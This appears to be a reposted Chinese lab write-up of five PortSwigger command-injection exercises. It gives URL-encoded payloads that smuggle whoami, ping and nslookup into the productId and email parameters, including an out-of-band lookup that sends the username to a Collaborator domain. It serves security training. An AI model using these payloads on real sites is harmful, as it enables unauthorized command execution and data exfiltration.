自学内容网 自学内容网

burpsuite官方靶场之命令注入

1.简单的命令注入

1.1 达成目标

成功执行whoami查看当前用户的名字。

1.2 攻击步骤

观察该靶场的页面,发现这是一个展示其商品信息的页面,点击view details可以展示每个商品的详情。

1692869192_64e72248120be99c1bf35.png!small?1692869193265

来到一个商品的详情页,发现画框部分是检查商品库存的功能。

1692869203_64e722535f30270e97dfe.png!small?1692869204451

对此进行抓包,发现传递了productId和storeId参数。

1692869225_64e7226933c0e5b219bd9.png!small?1692869225959

对productId插入其payload

# payload

%26whoami%26

%26是对&的url编码,因为在http数据包中,&符号用来分隔不同的参数,如果直接使用&那么,会被http数据包当成分割符,因此需要进行url编码,当进行数据传递之后,对此进行解码,使其&生效。

在系统命令中,&符号用来拼接其命令,让拼接的几个命令分别运行。

1692869243_64e7227b4a550dd3f5a50.png!small?1692869243988

1692869253_64e72285f136d88151c16.png!small?1692869254443

2.利用时间延迟的命令盲注

2.1 达成目标

利用命令盲注导致10秒的延迟。

2.2 攻击步骤

来到Submit feedback页面,这是一个给网站提交反馈的页面。因为要向起管理员提交用户反馈,因此很可能使用了sendmail命令。使用该命令向管理员邮箱发送反馈用户的名字,邮箱以及反馈信息等。也正因为是往管理员发送邮件,因此可能网站本身不会有回显。

1692869375_64e722ffd6a06ef3f5f70.png!small?1692869377095

抓取提交反馈的数据包,往email插入payload

# payload

%26ping -c10127.0.0.1%26

1692869389_64e7230dcbe2b546313ab.png!small?1692869390501

1692869399_64e72317ac9bbf0362dcd.png!small?1692869400274

3.利用输出重定向的命令盲注

3.1 达成目标

该靶场存在一个可写的文件夹:/var/www/images

执行whoami命令,将其结果重定向输出到这个文件夹下面,然后检索其内容

3.2 攻击步骤

还是来到提交反馈的页面。

1692869416_64e72328690b9398b04d0.png!small?1692869417240

在提交反馈的时候进行抓包,然后在email输入其payload。

1692869431_64e723378373c8d876f64.png!small?1692869432402

在靶场的主界面观察其数据包,发现了一个image的路径用来加载其图片,该路径传递filename参数。

1692869450_64e7234a52264b37a374e.png!small?1692869451129

1692869459_64e72353f2c3980036b9d.png!small?1692869460465

1692869467_64e7235b92d0e1a39ca78.png!small?1692869468239

4.利用带外通道技术进行命令盲注

4.1 达成目标

利用命令盲注对burpsuite的collaborator发起DNS查询。

4.2 攻击步骤

还是一样的页面,开干。

1692869484_64e7236c6c3ed8b0cd038.png!small?1692869485238

对该页面提交任意的测试数据,然后点击Submit feedback,对此进行抓包。

1692869499_64e7237b3ff65db4e3213.png!small?1692869499983

来到burpsuite的collaborator,激活此功能。

该功能用来充当一个dns查询的服务器,可以把一些在渗透测试中不能直接通过其响应数据探测到的漏洞,通过out-of-band技术,在这里也就是利用collaborator这个集成在burpsutie软件里面的功能,使得通过其响应看不到的漏洞,通过这种方式显形。这个功能就类似于dnslog。

1692869524_64e72394da478400cafeb.png!small?1692869525484

还是一样的,盯死email参数,往该参数插入payload。

1692869541_64e723a562cb0a679ddd1.png!small?1692869541938

# payload

%26nslookup%200no5vo9uebzjpzworih5vhzzyq4hs7gw.oastify.com%26

1692869555_64e723b383f4627963b4c.png!small?1692869556309

1692869563_64e723bbacb094c6f6703.png!small?1692869564297

1692869573_64e723c52e520e6b83383.png!small?1692869573923

1692869580_64e723cc4c7612b160f4c.png!small?1692869580777

5.利用带外通道技术获取系统用户名

5.1 达成目标

利用带外通道技术获取系统用户名。

5.2 攻击步骤

是的,没错,还是一样的页面。

1692869629_64e723fd575109f2f1f3d.png!small?1692869630235

随意提交一些测试数据,然后提交其反馈进行抓包。

1692869642_64e7240a65cfa01c1be03.png!small?1692869642947

一样的,盯死email参数,插入Payload。

# payload

%26nslookup%20`whoami`.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com%26

在该payload中,``符号也就是键盘的左上角(反引号),该符号应用在系统的shell中那么符号里面的字符是会被当成命令执行的

1692869657_64e7241955635dc1ba1a3.png!small?1692869658297

1692869665_64e7242103a97a4eae1db.png!small?1692869665613

现在,在该下图的按钮中提交我们所获取的用户名。

1692869683_64e724334b6d349681abf.png!small?1692869684318

1692869691_64e7243bebb3fd8558a1c.png!small?1692869692922


原文地址:https://blog.csdn.net/qq_32277727/article/details/140261636

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!